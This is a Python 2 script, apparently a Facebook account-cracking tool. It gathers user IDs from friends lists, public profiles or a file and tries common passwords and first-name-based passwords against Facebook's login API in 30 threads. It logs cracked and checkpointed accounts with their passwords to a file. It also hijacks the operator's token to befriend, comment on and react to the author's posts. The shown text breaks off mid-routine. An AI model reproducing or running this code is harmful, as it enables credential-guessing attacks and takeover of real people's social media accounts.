#!/usr/bin/python2
# coding=utf-8
import os,sys,time,mechanize,itertools,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool

#### WARNA RANDOM ####
P  = '\033[1;97m'  # white
M  = '\033[1;91m' # red
H  = '\033[1;92m' # green
K = '\033[1;93m' # yellow
B  = '\033[1;94m' # blue
U  = '\033[1;95m' # pink
O = '\033[1;96m' # sky blue

my_color = [P, M, H, K, B, U, O]
warna = random.choice(my_color)
warni = random.choice(my_color)

try:
	import mechanize
except ImportError:
	os.system("pip2 install mechanize")
try:
	import requests
except ImportError:
	os.system("pip2 install requests")
	os.system("python2 cr4ck.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
from datetime import datetime

reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

os.system("clear")
done = False
def animate():
    for c in itertools.cycle(['\033[1;96m|', '\033[1;92m/', '\033[1;95m-', '\033[1;91m\\']):
        if done:
            break
        sys.stdout.write('\r\033[1;93mLoading ' + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c )
        sys.stdout.flush()
        time.sleep(0.1)
 
t = threading.Thread(target=animate)
t.start()
 
time.sleep(5)
done = True

def keluar():
	print "\033[1;97m{\033[1;91m!\033[1;97m} Keluar"
	os.sys.exit()
	
	
def acak(x):
    w = 'mhkbpcP'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)
    
    
def cetak(x):
    w = 'mhkbpcP'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'%s;'%str(31+j))
    x += ''
    x = x.replace('!0','')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)
		
#########LOGO#########
logo = """ 
   \033[031m   _________________      _____   .___ 
   \033[031m  /   _____/\_____  \    /     \  |   |
   \033[032m  \_____  \  /   |   \  /  \ /  \ |   |
   \033[032m  /        \/    |    \/    Y    \|   |
   \033[033m /_______  /\_______  /\____|__  /|___|
   \033[033m         \/         \/         \/      
\033[1;95m⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃
\033[1;95m{\033[1;96m×\033[1;95m} \033[1;93mAuthor \033[1;91m: \033[1;96mSomi Awan
\033[1;95m{\033[1;96m×\033[1;95m} \033[1;93mFacebook \033[1;91m: \033[1;96mSomi Awan
\033[1;95m{\033[1;96m×\033[1;95m} \033[1;93mWhatsAp \033[1;91m: \033[1;96m03455453538
\033[1;95m⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃⁃"""

back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
id = []

###### MASUK ######
def masuk():
	os.system('clear')
	print logo
	print 50* "\033[1;94m─"
	print "\033[1;92m---(1--> \033[1;97mLogin Via Token Facebook"
	print "\033[1;92m---(2--> \033[1;97mDownload Token Creater App"
	print "\033[1;92m---(3--> \033[1;97mGet Token From Link"
	print "\033[1;92m---(4--> \033[1;97mLogin Via Cookies Facebook"
	print "\033[1;92m---(0--> \033[1;97mStop process"
	
	print 50* "\033[1;94m─"
	pilih_masuk()

def pilih_masuk():
	msuk = raw_input("\033[1;92mSelect \033[91m-->\033[1;92m ")
	if msuk =="":
		print"\033[1;97m[\033[1;91m!\033[1;97m] Input Wrong!"
		pilih_masuk()
	elif msuk =="1" or msuk =="01":
		tokenz()
	elif msuk =="2"or msuk =="02":
		ambil_token()
	elif msuk =="3"or msuk =="03":
		ambil_link()
	elif msuk =="4"or msuk =="04":
		cookie()
	elif msuk =="0" or msuk =="00":
		keluar()
	else:
		print"\033[1;97m[\033[1;91m!\033[1;97m] warning Again!"
		pilih_masuk()
		
#####LOGIN_COOKIE#####
def cookie():
    try:
          cek = open("cookies").read()
    except FileNotFoundError:
          cek = input("\033[00mCookies --> \033[1;96m")
    cek = {"cookie":cek}
    ismi = ses.get(mbasic.format("/me",verify=False),cookies=cek).content
    if "mbasic_logout_button" in str(ismi):
        if "Hallo Sob" in str(ismi):
            with open("cookies","w") as f:
                 f.write(cek["cookie"])
        else:
            try:
                 requests.get(mbasic.format(parser(ismi,"html.parser").find("a",string="Bahasa Indonesia")["href"]),cookies=cek)
            except:
                 pass
        try:
             ikuti = parser(requests.get(mbasic.format("/xzcoder.xzcoder"),cookies=cek).content,"html.parser").find("a",string="Ikuti")["href"]
             ses.get(mbasic.format(ikuti),cookies=cek)
        except:
             pass
        return cek["cookie"]
    else:
        print('\033[00mCookies \033[91mInvalid\033[00m')
        time.sleep(1)
        os.system('python fb.py')
			
#####LOGIN_TOKENZ#####
def tokenz():
	os.system('clear')
	print logo
	print 47* "\033[1;94m─"
	print"\033[1;91m╔═══════════════╗"
    print"\033[1;91m|\033[1;97mENTER FB TOKEN\033[1;91m |"
    print"\033[1;91m╚═══════════════╝"
	toket = raw_input("\033[1;97m{\033[1;95m?\033[1;97m} Paste Token \033[1;91m:\033[1;92m ")
	animate()
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		zedd = open("login.txt", 'w')
		zedd.write(toket)
		zedd.close()
		print '\033[1;97m{\033[1;92m✓\033[1;97m}\033[1;93m Login Successful '
		os.system('xdg-open https://chat.whatsapp.com/DT9eB2QOpXnKU3WNkzuilU')
		bot_komen()
	except KeyError:
		print "\033[1;97m{\033[1;91m!\033[1;97m} \033[1;91mCheckpoint !"
		time.sleep(1.7)
		masuk()

######AMBIL_TOKEN######
def ambil_token():
	os.system ("clear")
	print logo
	print 50* "\033[1;94m─"
	jalan("        \033[1; 92mYou will be redirected to the browser...")
	os.system('xdg-open https://drive.google.com/file/d/1eAuQG4aFIH49r0ACpoUWspnSG2VUl4Ci/view?usp=drivesdk')
	time.sleep(2)
	masuk()
	
##### AMBIL LINK #####
def ambil_link():
	os.system("clear")
	print logo
	print 50* "\033[1;94m─"
	jalan("\033[1;92mProhibited Using Old Facebook Account ...")
	jalan("\033[1;92m Required to Use a New Facebook Account ...")
	jalan("\033[1;92m If you want to use an old Facebook account...")
	jalan("\033[1;92m Mandatory To Use The Application That Is Provided...")
	os.system ("cd ... && npm install")
	jalan ("\033[1;96mMulai...")
	os.system ("cd ... && npm start")
	raw_input("\n[ back ]")
	masuk()
	
###### BOT KOMEN #######
def bot_komen():
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\033[1;97m[!] Token invalid"
		os.system('rm -rf login.txt')
	una = ('100047165779215')
	kom = ('Mantap Bang 😘')
	reac = ('LOVE')
	post = ('213235416925316')
	post2 = ('209016597347198')
	kom2 = ('Izin Pake Sc Lu Ya Bang 😁')
	reac2 = ('ANGRY')
	requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +una+ '&access_token=' + toket)
	requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
	requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
	requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
	requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
	menu()

###### MENU #######
def menu():
	os.system('clear')
	try:
		toket = open('login.txt','r').read()
	except IOError:
		print "{!} Token Invalid !"
		os.system('clear')
		os.system('rm -rf login.txt')
		masuk()
	try:
		otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print"\033[1;96m[!] \033[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		masuk()
		time.sleep(1)
		masuk()
	except requests.exceptions.ConnectionError:
		print"{!} Connection Error"
		keluar()
	os.system("clear")
	print logo
	print 47* "\033[1;94m─"
	print "\033[1;97m{\033[1;96m•\033[1;97m}\033[1;95m NAME\033[1;90m    =>\033[1;92m " +nama
	print "\033[1;97m{\033[1;96m•\033[1;97m}\033[1;95m USER ID\033[1;90m =>\033[1;92m " + id
	print 47* "\033[1;94m─"
	print "\033[1;97m--("+warni+"01\033[1;97m)--"+warna+" Crack ID From Friends / Public"
	print "\033[1;97m--("+warni+"02\033[1;97m)--"+warna+" Find ID Using Username"
	print "\033[1;97m--("+warni+"03\033[1;97m)--"+warna+" Update Script"
	print "\033[1;97m--(\033[1;91m00\033[1;97m)--"+warna+" Back"
	print 47* "\033[1;94m─"
	pilih()
	
######PILIH######
def pilih():
	unikers = raw_input("\033[1;92mSelect \033[91m-->\033[1;92m ")
	if unikers =="":
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Wrong input!"
		pilih()
	elif unikers =="1" or unikers =="01":
		crack_teman()
	elif unikers =="2" or unikers =="02":
		user_id()
	elif unikers =="3" or unikers =="03":
		perbarui()
	elif unikers =="0" or unikers =="00":
		os.system('clear')
		jalan('Removed token')
		os.system('rm -rf login.txt')
		keluar()
	else:
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Warning !"
		pilih()
		
##### CRACK TEMAN/PUBLIK #####
def crack_teman():
	os.system("clear")
	print logo
	print 47* "\033[1;94m─"
	print "\033[1;97m--("+warna+"03\033[1;97m)--"+warna+" Crack ID Usa"
	print "\033[1;97m--("+warna+"04\033[1;97m)--"+warna+" Crack ID Pakistan"
	print "\033[1;97m{\033[1;91m00\033[1;97m}"+warni+" Back"
	print 47* "\033[1;94m─"
	pilih_teman()
	
######PILIH######
def pilih_teman():
	univ = raw_input(""+warna+"Select \033[91m-->\033[1;92m ")
	if univ =="":
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m wrong input!"
		pilih_teman()
	elif univ =="1" or univ =="01":
		crack_usa()
	elif univ =="2" or univ =="02":
		crack_pakis()
	elif univ =="0" or univ =="00":
		menu()
	else:
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Warning!"
		pilih_teman()
		


##### CRACK USA #####
def crack_usa():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\033[1;96m[!] \x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		keluar()
	os.system('clear')
	print logo
	print 47* "\033[1;94m─"
	print "\033[1;97m--(\033[1;95m01\033[1;97m)-- Crack From Friends List "
	print "\033[1;97m--(\033[1;95m02\033[1;97m)-- Crack From Public / Friends "
	print "\033[1;97m--(\033[1;95m03\033[1;97m)-- Crack From File"
	print "\033[1;97m--(\033[1;91m00\033[1;97m)-- Close Cloning process"
	print 47* "\033[1;94m─"
	pilih_usa()

#### PILIH USA ####
def pilih_usa():
	teak = raw_input("\033[1;92mSelect  \033[91m-->\033[1;92m ")
	if teak =="":
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Wrong entery!"
		pilih_usa()
	elif teak =="1" or teak =="01":
		os.system('clear')
		print logo
		print 47* "\033[1;94m─"
		print ("                \033[1;95m★★★ \033[1;97mCRACK USA \033[1;95m★★★")
		print 47* "\033[1;94m─"
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif teak =="2" or teak =="02":
		os.system('clear')
		print logo
		print 47* "\033[1;94m─"
		print ("                \033[1;95m★★★ \033[1;97mCRACK USA \033[1;95m★★★")
		print 47* "\033[1;94m─"
		idt = raw_input("\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95mID Public / Friends \033[1;91m:\033[1;92m ")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95mName \033[1;91m:\033[1;92m "+op["name"]
		except KeyError:
			print"\033[1;97m{\033[1;91m!\033[1;97m} Missing public / friend ID !"
			raw_input("\n\033[1;95m[\033[1;97m<Back>\033[1;95m]")
			crack_usa()
		except requests.exceptions.ConnectionError:
			print"\033[1;97m{\033[1;91m!\033[1;97m} Connection Error!"
			keluar()
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif teak =="3" or teak =="03":
		os.system('clear')
		print logo
		try:
			print 50* "\033[1;94m─"
			print ("                \033[1;95m★★★ \033[1;97mCRACK USA \033[1;95m★★★")
			print 50* "\033[1;94m─"
			idlist = raw_input('\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95mName File\033[1;91m :\033[1;92m ')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except KeyError:
			print '\033[1;97m{\033[1;91m!\033[1;97m} File does not exist ! '
			raw_input('\n\033[1;92m[ \033[1;97m<back>\033[1;92m]')
		except IOError:
			print '\033[1;97m{\033[1;91m!\033[1;97m} File does not exist !'
			raw_input("\n\033[1;95m[\033[1;97m<back>\033[1;95m]")
			crack_usa()
	elif teak =="0" or teak =="00":
		menu()
	else:
		print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Fill Correctly !"
		pilih_usa()
	
	print "\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95mTotal ID \033[1;91m:\033[1;92m "+str(len(id))
	print('\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95mStop Tekan CTRL+Z')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95m Crack Running "+o),;sys.stdout.flush();time.sleep(1)
	print("\n\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95m Use Airplane Mode If There Is No Result ")
	print('\033[1;93m⊰\033[1;91m════\033[1;32m═════\033[1;33m═════\033[1;34m═════\033[1;35m══════\033[1;36m══════\033[1;31m═══════\033[1;32m═══════\033[1;93m⊱')
	
	
##### MAIN USA #####
	def main(arg):
		sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
		global cekpoint,oks
		zowe = arg
		try:
			os.mkdir('done')
		except OSError:
			pass
		try:
			an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
			j = json.loads(an.text)
			bos1 = ('iloveyou')
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			ko = json.load(data)
			if 'access_token' in ko:
				print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
				print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;92m") + j['name']
				print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
				print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos1
				oke = open("done/usa.txt", "a")
				oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos1+"\n")
				oke.close()
				oks.append(zowe)
			else:
				if 'www.facebook.com' in ko['error_msg']:
					print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKP\033[1;91mOINT")
					print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;95m") + j['name']
					print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;95m") + zowe
					print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;95m") + bos1
					cek = open("done/usa.txt", "a")
					cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos1+"\n")
					cek.close()
					cekpoint.append(zowe)
				else:
					bos2 = ('123456')
					data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					ko = json.load(data)
					if 'access_token' in ko:
						print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
						print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;92m") + j['name']
						print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
						print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos2
						oke = open("done/usa.txt", "a")
						oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos2+"\n")
						oke.close()
						oks.append(zowe)
					else:
						if 'www.facebook.com' in ko['error_msg']:
							print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEK\033[1;91mPOINT")
							print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;95m") + j['name']
							print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;95m") + zowe
							print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;95m") + bos2
							cek = open("done/usa.txt", "a")
							cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos2+"\n")
							cek.close()
							cekpoint.append(zowe)
						else:
							bos3 = j['first_name']+'123'
							data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
							ko = json.load(data)
							if 'access_token' in ko:
								print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
								print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;92m") + j['name']
								print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
								print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos3
								oke = open("done/usa.txt", "a")
								oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos3+"\n")
								oke.close()
								oks.append(zowe)
							else:
								if 'www.facebook.com' in ko['error_msg']:
									print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKP\033[1;91mOINT")
									print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;95m") + j['name']
									print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;95m") + zowe
									print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;95m") + bos3
									cek = open("done/usa.txt", "a")
									cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos3+"\n")
									cek.close()
									cekpoint.append(zowe)
								else:
									bos4 = j['first_name']+'1234'
									data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
									ko = json.load(data)
									if 'access_token' in ko:
										print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
										print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;92m") + j['name']
										print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
										print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos4
										oke = open("done/usa.txt", "a")
										oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos4+"\n")
										oke.close()
										oks.append(zowe)
									else:
										if 'www.facebook.com' in ko['error_msg']:
											print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEK\033[1;91mPOINT")
											print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;95m") + j['name']
											print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;95m") + zowe
											print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;95m") + bos4
											cek = open("done/usa.txt", "a")
											cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos4+"\n")
											cek.close()
											cekpoint.append(zowe)
										else:
											bos5 = j['first_name']+'12345'
											data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
											ko = json.load(data)
											if 'access_token' in ko:
												print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mHac\033[1;91mked")
												print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;92m") + j['name']
												print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;92m") + zowe
												print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;92m") + bos5
												oke = open("done/usa.txt", "a")
												oke.write("\n{×} BERHASIL \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos5+"\n")
												oke.close()
												oks.append(zowe)
											else:
												if 'www.facebook.com' in ko['error_msg']:
													print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEK\033[1;91mPOINT")
													print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama  \x1b[1;91m    --> \x1b[1;95m") + j['name']
													print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User  \x1b[1;91m    --> \x1b[1;95m") + zowe
													print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password  \x1b[1;91m--> \x1b[1;95m") + bos5
													cek = open("done/usa.txt", "a")
													cek.write("\n{×} CEKPOINT \n{×} Nama     > " +j['name']+ "\n{×} User     > " +zowe+ "\n{×} Password > " +bos5+"\n")
													cek.close()
													cekpoint.append(zowe)
																			
		except:
			pass
			
	p = ThreadPool(30)
	p.map(main, id)
	print "\n\033[1;94m──────────────────────────────────────────────────"
	print '\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95m Done ...'
	print"\033[1;97m{\033[1;95m★\033[1;97m} \033[1;95mTotal \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
	print '\033[1;97m{\033[1;95m★\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;95mfile tersimpan \033[1;91m: \033[1;92mdone/usa.txt'
	print 47* "\033[1;94m─"
	raw_input("\033[1;97m{<\033[1;95mBack\033[1;97m>}")
	os.system("python2 cr4ck.py")
	
##### CRACK PAKISTAN #####
def crack_pakis():
	global toket
	os.system('clear')
	try:
		toket=open('login.txt','r').read()
	except IOError:
		print"\033[1;96m[!] \x1b[1;91mToken invalid"
		os.system('rm -rf login.txt')
		time.sleep(1)
		keluar()
	os.system('clear')
	print logo
	print 47* "\033[1;94m─"
	print "\033[1;97m--(\033[1;95m01\033[1;97m)-- Crack From Friends List "
	print "\033[1;97m--(\033[1;95m02\033[1;97m)-- Crack From Public / Friends "
	print "\033[1;97m--(\033[1;95m03\033[1;97m)-- Crack From File"
	print "\033[1;97m--(\033[1;91m00\033[1;97m)-- Close Cloning process"
	
	print 47* "\033[1;94m─"
	pilih_pakis()

#### PILIH PAKISTAN ####
def pilih_pakis():
	teak = raw_input("\033[1;91mSelect \033[91m-->\033[1;92m ")
	if teak =="":
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m wrong input!"
		pilih_pakis()
	elif teak =="1" or teak =="01":
		os.system('clear')
		print logo
		print 47* "\033[1;94m─"
		print ("             \033[1;91m★★★ \033[1;97mCRACK PAKISTAN \033[1;91m★★★")
		print 47* "\033[1;94m─"
		r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
		z = json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif teak =="2" or teak =="02":
		os.system('clear')
		print logo
		print 47* "\033[1;94m─"
		print ("             \033[1;91m✲✲✲ \033[1;97mCRACK PAKISTAN \033[1;91m✲✲✲")
		print 47* "\033[1;94m─"
		idt = raw_input("\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;91mID Public / Friends \033[1;91m:\033[1;92m ")
		try:
			jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
			op = json.loads(jok.text)
			print"\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;91mName  \033[1;91m:\033[1;92m "+op["name"]
		except KeyError:
			print"\033[1;97m{\033[1;91m!\033[1;97m} Missing public / friend ID !"
			raw_input("\n\033[1;91m[\033[1;97m<back>\033[1;91m]")
			crack_pakis()
		except requests.exceptions.ConnectionError:
			print"\033[1;97m{\033[1;91m!\033[1;97m} File does not exist !!"
			keluar()
		r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
		z = json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif teak =="3" or teak =="03":
		os.system('clear')
		print logo
		try:
			print 47* "\033[1;94m─"
			print ("             \033[1;91m✲✲✲ \033[1;97mCRACK PAKISTAN \033[1;91m✲✲✲")
			print 47* "\033[1;94m─"
			idlist = raw_input('\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;93mName File\033[1;91m :\033[1;92m ')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except KeyError:
			print '\033[1;97m{\033[1;91m!\033[1;97m} File does not exist !! '
			raw_input('\n\033[1;92m[ \033[1;97mback\033[1;92m]')
		except IOError:
			print '\033[1;97m{\033[1;91m!\033[1;97m} File does not exist !!'
			raw_input("\n\033[1;91m[\033[1;97m<back>\033[1;91m]")
			crack_pakis()
	elif teak =="0" or teak =="00":
		menu()
	else:
		print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m File does not exist ! !"
		pilih_pakis()
	
	print "\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;93mTotal ID \033[1;91m:\033[1;92m "+str(len(id))
	print('\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;93mStop Tekan CTRL+Z')
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;93mCrack Running"+o),;sys.stdout.flush();time.sleep(1)
	print("\n\033[1;97m{\033[1;91m∝\033[1;97m} \033[1;97mUse Airplane Mode If There Is No Result")
	print('\033[1;93m⊰\033[1;91m════\033[1;32m═════\033[1;33m═════\033[1;34m═════\033[1;35m══════\033[1;36m══════\033[1;31m═══════\033[1;32m═══════\033[1;93m⊱')
	
	
##### MAIN PAKISTAN #####
	def main(arg):
		sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
		global cekpoint,oks
		zowe = arg
		try:
			os.mkdir('done')
		except OSError:
			pass
		try:
			an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
			j = json.loads(an.text)
			bos1 = j['first_name'].lower()+'123'
			data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			ko = json.load(data)
